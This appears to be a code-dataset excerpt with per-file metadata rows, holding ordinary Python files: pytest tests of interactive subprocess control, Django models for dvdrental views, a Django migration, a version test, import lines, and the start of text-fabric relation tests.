    The returned value is identical to the previous four literal dicts,
    which differed only in id/title/author/created_at.
    """
    details = [
        (1, 'Article One', 'Felix Essienne', '04-25-2019'),
        (2, 'Article Two', 'John Doe', '11-01-2019'),
        (3, 'Article Three', 'Adelaide Nyaba', '04-12-2019'),
        (4, 'Article Four', 'Rosina Ama', '01-09-2019'),
    ]
    return [
        {
            'id': article_id,
            'title': title,
            'body': _LOREM_BODY,
            'author': author,
            'created_at': created,
        }
        for article_id, title, author, created in details
    ]
| 62.235294
| 358
| 0.649338
| 269
| 2,116
| 5.092937
| 0.297398
| 0.035037
| 0.040876
| 0.055474
| 0.840876
| 0.840876
| 0.840876
| 0.840876
| 0.840876
| 0.840876
| 0
| 0.023514
| 0.276465
| 2,116
| 33
| 359
| 64.121212
| 0.871326
| 0
| 0
| 0.125
| 0
| 0.125
| 0.747164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb43cc296228e5df371c4f71dc501d09ccadf778
| 8,204
|
py
|
Python
|
test/control/process/test_interactive.py
|
HansBug/pji
|
449d171cea0c03f4c302da886988f36f70e34ee6
|
[
"Apache-2.0"
] | null | null | null |
test/control/process/test_interactive.py
|
HansBug/pji
|
449d171cea0c03f4c302da886988f36f70e34ee6
|
[
"Apache-2.0"
] | null | null | null |
test/control/process/test_interactive.py
|
HansBug/pji
|
449d171cea0c03f4c302da886988f36f70e34ee6
|
[
"Apache-2.0"
] | null | null | null |
import time
from threading import Thread
import pytest
from pji.control import interactive_process, ResourceLimit, InteractiveProcess, RunResultStatus
# noinspection DuplicatedCode
@pytest.mark.unittest
class TestControlProcessInteractive:
    """End-to-end tests for pji.control.interactive_process.

    Every test drives a real shell subprocess, so the output assertions
    rely on sleeps; keep the sleep budgets in mind when editing.
    """

    @staticmethod
    def _collect_output(ip):
        """Drain ip.output_yield on a background thread.

        Returns a list that grows as the process emits output; only the raw
        line from each (rel_time, tag, line) tuple is recorded. This
        replaces the _ip_loader closure that was duplicated in five tests.
        """
        collected = []

        def _loader():
            for _rel_time, _tag, _line in ip.output_yield:
                collected.append(_line)

        Thread(target=_loader).start()
        return collected

    def test_interactive_process_simple(self):
        """Shell command output arrives incrementally and the run exits cleanly."""
        _before_start = time.time()
        with interactive_process(
                args="echo 233 && sleep 2 && echo 2334",
                shell=True,
        ) as ip:
            _after_start = time.time()
            # start_time is captured while entering the context manager.
            assert _before_start <= ip.start_time <= _after_start

            _output = self._collect_output(ip)
            time.sleep(0.5)
            assert _output == [b'233']
            time.sleep(3)
            assert _output == [b'233', b'2334']

            ip.close_stdin()
            ip.join()

            _result = ip.result.result
            assert _result is not None
            assert _result.exitcode == 0
            assert _result.signal_code == 0

    def test_interactive_process_with_env(self):
        """Variables passed via environ are visible to the shell command."""
        _before_start = time.time()
        with interactive_process(
                args="echo 233 && sleep 2 && echo ${ENV_TEST}",
                shell=True,
                environ={'ENV_TEST': '2334'},
        ) as ip:
            _after_start = time.time()
            assert _before_start <= ip.start_time <= _after_start

            _output = self._collect_output(ip)
            time.sleep(0.5)
            assert _output == [b'233']
            time.sleep(3)
            assert _output == [b'233', b'2334']

            ip.close_stdin()
            ip.join()

            _result = ip.result.result
            assert _result is not None
            assert _result.exitcode == 0
            assert _result.signal_code == 0

    def test_interactive_process_with_input(self):
        """Lines written to stdin are executed; the result exists only after join."""
        _before_start = time.time()
        with interactive_process(
                args='sh',
                environ={'ENV_TEST': '233jsdf'}
        ) as ip:
            _after_start = time.time()
            assert _before_start <= ip.start_time <= _after_start

            _output = self._collect_output(ip)
            ip.print_stdin(bytes('echo 233', 'utf8'))
            time.sleep(0.2)
            assert _output == [b'233']
            time.sleep(1.0)
            assert _output == [b'233']

            ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
            time.sleep(0.2)
            assert _output == [b'233', b'233jsdf']

            # While stdin is open the run is still in progress.
            assert ip.result.result is None
            assert ip.status == RunResultStatus.NOT_COMPLETED
            assert not ip.ok
            assert not ip.completed

            ip.close_stdin()
            ip.join()

            _result = ip.result.result
            assert ip.ok
            assert ip.completed
            assert ip.status == RunResultStatus.SUCCESS
            assert _result is not None
            assert _result.exitcode == 0
            assert _result.signal_code == 0

    def test_interactive_process_rtle(self):
        """Hitting max_real_time kills the shell and breaks the stdin pipe."""
        _before_start = time.time()
        with interactive_process(
                args='sh',
                environ={'ENV_TEST': '233jsdf'},
                resources=ResourceLimit(
                    max_real_time='2s',
                )
        ) as ip:
            _after_start = time.time()
            assert _before_start <= ip.start_time <= _after_start

            _output = self._collect_output(ip)
            ip.print_stdin(bytes('echo 233', 'utf8'))
            time.sleep(0.2)
            assert _output == [b'233']
            # Wait past the 2s real-time limit: the process is dead now.
            time.sleep(2.0)
            assert _output == [b'233']

            # Every further write to the dead process fails the same way.
            with pytest.raises(BrokenPipeError):
                ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
            time.sleep(0.2)
            assert _output == [b'233']
            with pytest.raises(BrokenPipeError):
                ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
            with pytest.raises(BrokenPipeError):
                ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))

            ip.close_stdin()
            ip.join()

            _result = ip.result.result
            assert _result is not None
            assert _result.exitcode == 0
            # Killed by the real-time limit; 9 matches SIGKILL on POSIX.
            assert _result.signal_code == 9

    def test_interactive_process_rtle_pass(self):
        """A generous max_real_time does not interfere with a normal session."""
        _before_start = time.time()
        with interactive_process(
                args='sh',
                environ={'ENV_TEST': '233jsdf'},
                resources=ResourceLimit(
                    max_real_time='4s',
                )
        ) as ip:
            _after_start = time.time()
            assert _before_start <= ip.start_time <= _after_start

            _output = self._collect_output(ip)
            ip.print_stdin(bytes('echo 233', 'utf8'))
            time.sleep(0.2)
            assert _output == [b'233']
            time.sleep(2.0)
            assert _output == [b'233']

            ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
            time.sleep(0.2)
            assert _output == [b'233', b'233jsdf']

            assert ip.result.result is None
            # NOTE(review): test_interactive_process_with_input checks
            # ip.status at this point rather than ip.result.status --
            # presumably equivalent; confirm against the RunResult API.
            assert ip.result.status == RunResultStatus.NOT_COMPLETED
            assert not ip.ok
            assert not ip.completed

            ip.close_stdin()
            ip.join()

            _result = ip.result.result
            assert ip.ok
            assert ip.completed
            assert ip.status == RunResultStatus.SUCCESS
            # Check for None before touching attributes so a missing result
            # fails as an assertion, not an AttributeError (the original
            # asserted _result.ok first).
            assert _result is not None
            assert _result.ok
            assert _result.exitcode == 0
            assert _result.signal_code == 0

    @pytest.mark.timeout(5.0)
    def test_interactive_process_direct_close_1(self):
        """Leaving the context without close_stdin still completes the run."""
        with interactive_process(
                args="sh",
        ) as ip:
            assert isinstance(ip, InteractiveProcess)
            ip.print_stdin(b'echo 233')
            _, _tag, _line = next(ip.output_yield)
            assert _tag == 'stdout'
            assert _line.rstrip(b'\r\n') == b'233'
            ip.print_stdin(b'echo 2334')
            _, _tag, _line = next(ip.output_yield)
            assert _tag == 'stdout'
            assert _line.rstrip(b'\r\n') == b'2334'

        _result = ip.result.result
        assert _result.ok

    @pytest.mark.timeout(5.0)
    def test_interactive_process_direct_close_2(self):
        """Closing stdin explicitly before exit also completes the run."""
        with interactive_process(
                args="sh",
        ) as ip:
            assert isinstance(ip, InteractiveProcess)
            ip.print_stdin(b'echo 233')
            _, _tag, _line = next(ip.output_yield)
            assert _tag == 'stdout'
            assert _line.rstrip(b'\r\n') == b'233'
            ip.print_stdin(b'echo 2334')
            _, _tag, _line = next(ip.output_yield)
            assert _tag == 'stdout'
            assert _line.rstrip(b'\r\n') == b'2334'
            ip.close_stdin()

        _result = ip.result.result
        assert _result.ok

    def test_interactive_process_wtf(self):
        """A nonexistent executable raises EnvironmentError at spawn time."""
        with pytest.raises(EnvironmentError):
            with interactive_process(
                    args="what_the_fuck -c 'echo 233 && sleep 2 && echo 2334'",
            ):
                pytest.fail('Should not reach here')
| 31.79845
| 95
| 0.534252
| 901
| 8,204
| 4.567148
| 0.114317
| 0.038882
| 0.041069
| 0.050547
| 0.892831
| 0.881896
| 0.87582
| 0.859295
| 0.859295
| 0.859295
| 0
| 0.033256
| 0.365919
| 8,204
| 257
| 96
| 31.922179
| 0.757785
| 0.003291
| 0
| 0.852941
| 0
| 0
| 0.06104
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 1
| 0.063725
| false
| 0.004902
| 0.019608
| 0
| 0.088235
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7048e211710fc18b48264702ef5bd2f7b068e8f0
| 194
|
py
|
Python
|
route53/xml_generators/__init__.py
|
jccastillocano/python-route53
|
db182f99f2b6028b134bc45669ea0380d50fd75e
|
[
"MIT"
] | null | null | null |
route53/xml_generators/__init__.py
|
jccastillocano/python-route53
|
db182f99f2b6028b134bc45669ea0380d50fd75e
|
[
"MIT"
] | null | null | null |
route53/xml_generators/__init__.py
|
jccastillocano/python-route53
|
db182f99f2b6028b134bc45669ea0380d50fd75e
|
[
"MIT"
] | null | null | null |
from .created_hosted_zone import create_hosted_zone_writer
from .change_resource_record_set import change_resource_record_set_writer
from .created_health_check import create_health_check_writer
| 48.5
| 73
| 0.92268
| 29
| 194
| 5.586207
| 0.448276
| 0.135802
| 0.246914
| 0.283951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061856
| 194
| 3
| 74
| 64.666667
| 0.89011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
706a452a1ebb8b63be881c45c8cf98f73c6ee346
| 4,717
|
py
|
Python
|
web/dvdrental/database_views/models.py
|
osmanirosado/dvdrental-adminsite
|
15abe206620b36745abc17cd4af4d2499f6ada05
|
[
"MIT"
] | null | null | null |
web/dvdrental/database_views/models.py
|
osmanirosado/dvdrental-adminsite
|
15abe206620b36745abc17cd4af4d2499f6ada05
|
[
"MIT"
] | 4
|
2021-04-08T21:56:00.000Z
|
2022-02-10T13:22:49.000Z
|
web/dvdrental/database_views/models.py
|
osmanirosado/dvdrental-adminsite
|
15abe206620b36745abc17cd4af4d2499f6ada05
|
[
"MIT"
] | null | null | null |
from django.db import models
class ActorInfo(models.Model):
    """Read-only mapping of the dvdrental 'actor_info' database view."""
    actor_id = models.IntegerField(blank=True, primary_key=True)
    first_name = models.CharField(max_length=45, blank=True, null=True)
    last_name = models.CharField(max_length=45, blank=True, null=True)
    # Free-text film summary produced by the view -- presumably aggregated
    # per actor; confirm against the view's SQL definition.
    film_info = models.TextField(blank=True, null=True)
    class Meta:
        verbose_name = 'Actor Info'
        verbose_name_plural = 'Actor Info List'
        managed = False  # Created from a view. Don't remove.
        db_table = 'actor_info'
class CustomerList(models.Model):
    """Read-only mapping of the dvdrental 'customer_list' database view."""
    id = models.IntegerField(blank=True, primary_key=True)
    name = models.TextField(blank=True, null=True)
    address = models.CharField(max_length=50, blank=True, null=True)
    # Maps the view column 'zip code' (with a space) to a valid attribute name.
    zip_code = models.CharField(db_column='zip code', max_length=10, blank=True,
                                null=True)  # Field renamed to remove unsuitable characters.
    phone = models.CharField(max_length=20, blank=True, null=True)
    city = models.CharField(max_length=50, blank=True, null=True)
    country = models.CharField(max_length=50, blank=True, null=True)
    notes = models.TextField(blank=True, null=True)
    sid = models.SmallIntegerField(blank=True, null=True)
    class Meta:
        verbose_name = 'Customer Info'
        verbose_name_plural = 'Customer List'
        managed = False  # Created from a view. Don't remove.
        db_table = 'customer_list'
class FilmList(models.Model):
    """Read-only mapping of the dvdrental 'film_list' database view."""
    fid = models.IntegerField(blank=True, primary_key=True)
    title = models.CharField(max_length=255, blank=True, null=True)
    description = models.TextField(blank=True, null=True)
    category = models.CharField(max_length=25, blank=True, null=True)
    price = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
    length = models.SmallIntegerField(blank=True, null=True)
    # Underlying column is likely an enum/domain type in PostgreSQL, hence
    # the inspectdb guess below.
    rating = models.TextField(blank=True, null=True)  # This field type is a guess.
    actors = models.TextField(blank=True, null=True)
    class Meta:
        verbose_name = 'Film Info'
        verbose_name_plural = 'Film List'
        managed = False  # Created from a view. Don't remove.
        db_table = 'film_list'
class NicerButSlowerFilmList(models.Model):
    """Read-only model backed by the ``nicer_but_slower_film_list`` view.

    Same columns as ``FilmList`` — the underlying views differ only in how
    they are computed (the view name suggests a slower formulation).
    ``managed = False``: Django does not create or migrate this table.
    """

    fid = models.IntegerField(blank=True, primary_key=True)
    title = models.CharField(max_length=255, blank=True, null=True)
    description = models.TextField(blank=True, null=True)
    category = models.CharField(max_length=25, blank=True, null=True)
    price = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
    length = models.SmallIntegerField(blank=True, null=True)
    rating = models.TextField(blank=True, null=True)  # This field type is a guess.
    actors = models.TextField(blank=True, null=True)

    class Meta:
        verbose_name = 'Film Info'
        verbose_name_plural = 'Nice But Slower Film List'
        managed = False  # Created from a view. Don't remove.
        db_table = 'nicer_but_slower_film_list'
class SalesByFilmCategory(models.Model):
    """Read-only model backed by the ``sales_by_film_category`` view.

    ``managed = False``: Django does not create or migrate this table.
    """

    category = models.CharField(max_length=25, blank=True, primary_key=True)
    # max_digits/decimal_places of 65535 is presumably inspectdb's rendering
    # of an unconstrained NUMERIC column in the view — TODO confirm.
    total_sales = models.DecimalField(max_digits=65535, decimal_places=65535, blank=True, null=True)

    class Meta:
        verbose_name = 'Film Category Sales'
        verbose_name_plural = 'Sales by Film Category'
        managed = False  # Created from a view. Don't remove.
        db_table = 'sales_by_film_category'
class SalesByStore(models.Model):
    """Read-only model backed by the ``sales_by_store`` database view.

    ``managed = False``: Django does not create or migrate this table.
    """

    # A TextField as primary key is unusual; the view exposes the store's
    # textual identifier as its unique column.
    store = models.TextField(blank=True, primary_key=True)
    manager = models.TextField(blank=True, null=True)
    # Presumably inspectdb's rendering of an unconstrained NUMERIC — TODO confirm.
    total_sales = models.DecimalField(max_digits=65535, decimal_places=65535, blank=True, null=True)

    class Meta:
        verbose_name = 'Store Sales'
        verbose_name_plural = 'Sales by Store'
        managed = False  # Created from a view. Don't remove.
        db_table = 'sales_by_store'
class StaffList(models.Model):
    """Read-only model backed by the ``staff_list`` database view.

    Mirrors ``CustomerList`` minus the ``notes`` column.
    ``managed = False``: Django does not create or migrate this table.
    """

    id = models.IntegerField(blank=True, primary_key=True)
    name = models.TextField(blank=True, null=True)
    address = models.CharField(max_length=50, blank=True, null=True)
    # db_column contains a space, which is not a valid Python identifier.
    zip_code = models.CharField(db_column='zip code', max_length=10, blank=True,
                                null=True)  # Field renamed to remove unsuitable characters.
    phone = models.CharField(max_length=20, blank=True, null=True)
    city = models.CharField(max_length=50, blank=True, null=True)
    country = models.CharField(max_length=50, blank=True, null=True)
    sid = models.SmallIntegerField(blank=True, null=True)

    class Meta:
        verbose_name = 'Staff Info'
        verbose_name_plural = 'Staff List'
        managed = False  # Created from a view. Don't remove.
        db_table = 'staff_list'
| 43.275229
| 100
| 0.698537
| 631
| 4,717
| 5.090333
| 0.14897
| 0.117684
| 0.141656
| 0.185243
| 0.856787
| 0.846513
| 0.815068
| 0.815068
| 0.788294
| 0.787049
| 0
| 0.015835
| 0.196735
| 4,717
| 108
| 101
| 43.675926
| 0.831882
| 0.083528
| 0
| 0.597701
| 0
| 0
| 0.071677
| 0.011134
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.655172
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7088892f4f83b2fb78cfdaf95cd8a08c5a95cfd7
| 150
|
py
|
Python
|
cirq-rigetti/cirq_rigetti/_version_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | 1
|
2022-02-05T22:17:39.000Z
|
2022-02-05T22:17:39.000Z
|
cirq-rigetti/cirq_rigetti/_version_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | 4
|
2022-01-16T14:12:15.000Z
|
2022-02-24T03:58:46.000Z
|
cirq-rigetti/cirq_rigetti/_version_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=wrong-or-nonexistent-copyright-notice
import cirq_rigetti
def test_version():
    """The installed cirq_rigetti package must report the expected version."""
    expected = "0.15.0.dev"
    assert cirq_rigetti.__version__ == expected
| 21.428571
| 55
| 0.766667
| 21
| 150
| 5.142857
| 0.809524
| 0.203704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030075
| 0.113333
| 150
| 6
| 56
| 25
| 0.781955
| 0.353333
| 0
| 0
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
560bcb537c6377d6282c8fe641a6de59f4a53459
| 1,872
|
py
|
Python
|
api/applications/migrations/0022_auto_20200331_1107.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | 3
|
2019-05-15T09:30:39.000Z
|
2020-04-22T16:14:23.000Z
|
api/applications/migrations/0022_auto_20200331_1107.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | 85
|
2019-04-24T10:39:35.000Z
|
2022-03-21T14:52:12.000Z
|
api/applications/migrations/0022_auto_20200331_1107.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | 1
|
2021-01-17T11:12:19.000Z
|
2021-01-17T11:12:19.000Z
|
# Generated by Django 2.2.11 on 2020-03-31 11:07
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add temporary-export fields to open and standard applications.

    Auto-generated (see the ``Generated by Django`` header). Every new field
    is nullable, so the migration applies to existing rows without backfill.
    """

    dependencies = [
        ("applications", "0021_baseapplication_agreed_to_foi"),
    ]

    operations = [
        migrations.AddField(
            model_name="openapplication",
            name="is_temp_direct_control",
            field=models.BooleanField(blank=True, default=None, null=True),
        ),
        migrations.AddField(
            model_name="openapplication",
            name="proposed_return_date",
            field=models.DateField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name="openapplication",
            name="temp_direct_control_details",
            field=models.CharField(blank=True, default=None, max_length=2200, null=True),
        ),
        migrations.AddField(
            model_name="openapplication",
            name="temp_export_details",
            field=models.CharField(blank=True, default=None, max_length=2200, null=True),
        ),
        # The same four fields are added to StandardApplication as well.
        migrations.AddField(
            model_name="standardapplication",
            name="is_temp_direct_control",
            field=models.BooleanField(blank=True, default=None, null=True),
        ),
        migrations.AddField(
            model_name="standardapplication",
            name="proposed_return_date",
            field=models.DateField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name="standardapplication",
            name="temp_direct_control_details",
            field=models.CharField(blank=True, default=None, max_length=2200, null=True),
        ),
        migrations.AddField(
            model_name="standardapplication",
            name="temp_export_details",
            field=models.CharField(blank=True, default=None, max_length=2200, null=True),
        ),
    ]
| 36
| 117
| 0.620726
| 186
| 1,872
| 6.053763
| 0.274194
| 0.127886
| 0.16341
| 0.191829
| 0.852575
| 0.852575
| 0.815275
| 0.815275
| 0.78508
| 0.741563
| 0
| 0.026316
| 0.269231
| 1,872
| 51
| 118
| 36.705882
| 0.796784
| 0.024573
| 0
| 0.777778
| 1
| 0
| 0.196272
| 0.072368
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.022222
| 0
| 0.088889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
562d4f798cac352a3e606fbd981fa61a3716babb
| 54,159
|
py
|
Python
|
test/generic/relations.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 10
|
2017-10-30T22:38:00.000Z
|
2018-12-12T06:10:10.000Z
|
test/generic/relations.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 37
|
2017-10-19T12:06:54.000Z
|
2018-12-13T10:18:23.000Z
|
test/generic/relations.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 3
|
2018-02-28T12:37:21.000Z
|
2018-06-23T08:32:54.000Z
|
import sys
import unittest

from tf.fabric import Fabric

# LOAD THE TEST CORPUS
# Initialise Text-Fabric on the local 'tf' data directory and load the
# 'sign' and 'name' features; F gives feature access, S the search API.
TF = Fabric('tf')
api = TF.load('sign name')
F = api.F
S = api.S

# MAKE CUSTOM SETS OF NODES
# Sign: every slot node (1..maxSlot); Node: every node (1..maxNode).
# Both ranges are 1-based and inclusive of the maximum.
Sign = set(range(1, F.otype.maxSlot + 1))
Node = set(range(1, F.otype.maxNode + 1))
sets = dict(Sign=Sign, Node=Node)
# RUN A QUERY, OPTIONALLY WITH CUSTOM SETS
def query(template, sets=None):
    """Run a Text-Fabric search *template* and return the results as a tuple.

    When *sets* is given, it is forwarded to ``S.search`` so the template can
    reference the custom node sets; otherwise the default search is used.
    """
    if sets is None:
        return tuple(S.search(template))
    return tuple(S.search(template, sets=sets))
# DEFINE THE TESTS
# Maps each relational operator of the search template language to the
# descriptive name used for the corresponding generated test. The k-variants
# (e.g. '=1:', '<2:') allow a slack of k slots; the '.f=g.', '.f#g.', '.f~re~g.'
# forms compare node feature values (equality, inequality, regex match).
relationKey = {
    '=': 'equal',
    '#': 'unequal',
    '<': 'canonicalBefore',
    '>': 'canonicalAfter',
    '==': 'sameSlots',
    '&&': 'overlap',
    '##': 'differentSlots',
    '||': 'disjointSlots',
    '[[': 'has',
    ']]': 'in',
    '<<': 'slotBefore',
    '>>': 'slotAfter',
    '=:': 'startSame',
    '=0:': 'startSame0',
    '=1:': 'startSame1',
    '=2:': 'startSame2',
    ':=': 'endSame',
    ':0=': 'endSame0',
    ':1=': 'endSame1',
    ':2=': 'endSame2',
    '::': 'sameBoundary',
    ':0:': 'sameBoundary0',
    ':1:': 'sameBoundary1',
    ':2:': 'sameBoundary2',
    '<:': 'adjacentBefore',
    '<0:': 'adjacentBefore0',
    '<1:': 'adjacentBefore1',
    '<2:': 'adjacentBefore2',
    ':>': 'adjacentAfter',
    ':0>': 'adjacentAfter0',
    ':1>': 'adjacentAfter1',
    ':2>': 'adjacentAfter2',
    '.namesign=namepart.': 'featureEqualSP',
    '.namesign=namesign.': 'featureEqualSS',
    '.namesign#namesign.': 'featureUnequalSS',
    '.namesign.': 'featureEqualSS',
    '.number.': 'featureEqualN',
    '.number#number.': 'featureUnEqualN',
    '.number>number.': 'featureGreaterN',
    '.number<number.': 'featureLesserN',
    '.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': 'featureFuzzySP1',
    '.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namesign.': 'featureFuzzySS1',
    '.namepart~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': 'featureFuzzyPP1',
    '.namesign~([sp]-)|(-[sp])~namepart.': 'featureFuzzySP2',
    '.namesign~([sp]-)|(-[sp])~namesign.': 'featureFuzzySS2',
    '.namepart~([sp]-)|(-[sp])~namepart.': 'featureFuzzyPP2',
}
# DEFINE THE PARAMETERS FOR EACH TEST
comparisons = {
'=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('part', 's1', 'part', 's1', True),
('part', 's1', 'part', 's2', False),
('part', 'lower', 'part', 'lower', True),
('part', 'lower', 'part', 'upper', False),
),
'#': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('part', 's1', 'part', 's1', False),
('part', 's1', 'part', 's2', True),
('part', 'lower', 'part', 'lower', False),
('part', 'lower', 'part', 'upper', True),
),
'<': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'd', 'sign', 'g', True),
('sign', 'g', 'sign', 'd', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'big', 'part', 'small1', True),
('part', 'big', 'part', 'small2', True),
('part', 'big', 'part', 'small3', True),
('part', 'big', 'part', 'small4', True),
('part', 'small1', 'part', 'big', False),
('part', 'small2', 'part', 'big', False),
('part', 'small3', 'part', 'big', False),
('part', 'small4', 'part', 'big', False),
('part', 'small5', 'part', 'big', False),
('part', 'small6', 'part', 'big', False),
('part', 'small7', 'part', 'big', False),
('part', 'small8', 'part', 'big', True),
('sign', 'a', 'part', 'big', True),
('sign', 'b', 'part', 'big', True),
('sign', 'c', 'part', 'big', False),
('sign', 'd', 'part', 'big', False),
('sign', 'i', 'part', 'big', False),
('sign', 'j', 'part', 'big', False),
),
'>': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'd', 'sign', 'g', False),
('sign', 'g', 'sign', 'd', True),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'big', 'part', 'small1', False),
('part', 'big', 'part', 'small2', False),
('part', 'big', 'part', 'small3', False),
('part', 'big', 'part', 'small4', False),
('part', 'small1', 'part', 'big', True),
('part', 'small2', 'part', 'big', True),
('part', 'small3', 'part', 'big', True),
('part', 'small4', 'part', 'big', True),
('part', 'small5', 'part', 'big', True),
('part', 'small6', 'part', 'big', True),
('part', 'small7', 'part', 'big', True),
('part', 'small8', 'part', 'big', False),
('sign', 'a', 'part', 'big', False),
('sign', 'b', 'part', 'big', False),
('sign', 'c', 'part', 'big', True),
('sign', 'd', 'part', 'big', True),
('sign', 'i', 'part', 'big', True),
('sign', 'j', 'part', 'big', True),
),
'==': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('part', 'john', 'part', 'mary', True),
('part', 'john', 'part', 'small4', False),
('sign', 'a', 'part', 's1', True),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'part', 'ss1', True),
('part', 'small1', 'part', 'big', False),
('part', 'big', 'part', 'small1', False),
),
'&&': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('part', 'john', 'part', 'mary', True),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'small4', True),
('part', 'lower', 'part', 'upper', False),
('part', 'odd', 'part', 'even', False),
('sign', 'c', 'part', 'odd', True),
('sign', 'd', 'part', 'odd', False),
('sign', 'c', 'part', 'even', False),
('sign', 'd', 'part', 'even', True),
),
'##': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('part', 'john', 'part', 'mary', False),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'big', True),
('sign', 'c', 'part', 'odd', True),
('sign', 'd', 'part', 'odd', True),
('part', 'even', 'sign', 'c', True),
('part', 'even', 'sign', 'd', True),
),
'||': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('part', 'john', 'part', 'mary', False),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'small4', False),
('part', 'lower', 'part', 'upper', True),
('part', 'odd', 'part', 'even', True),
('sign', 'c', 'part', 'odd', False),
('sign', 'd', 'part', 'odd', True),
('sign', 'c', 'part', 'even', True),
('sign', 'd', 'part', 'even', False),
),
'[[': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('part', 's1', 'sign', 'a', True),
('sign', 'a', 'part', 's1', False),
('part', 's1', 'part', 's1', False),
('part', 's1', 'part', 'ss1', True),
('part', 'ss1', 'part', 's1', True),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'mary', True),
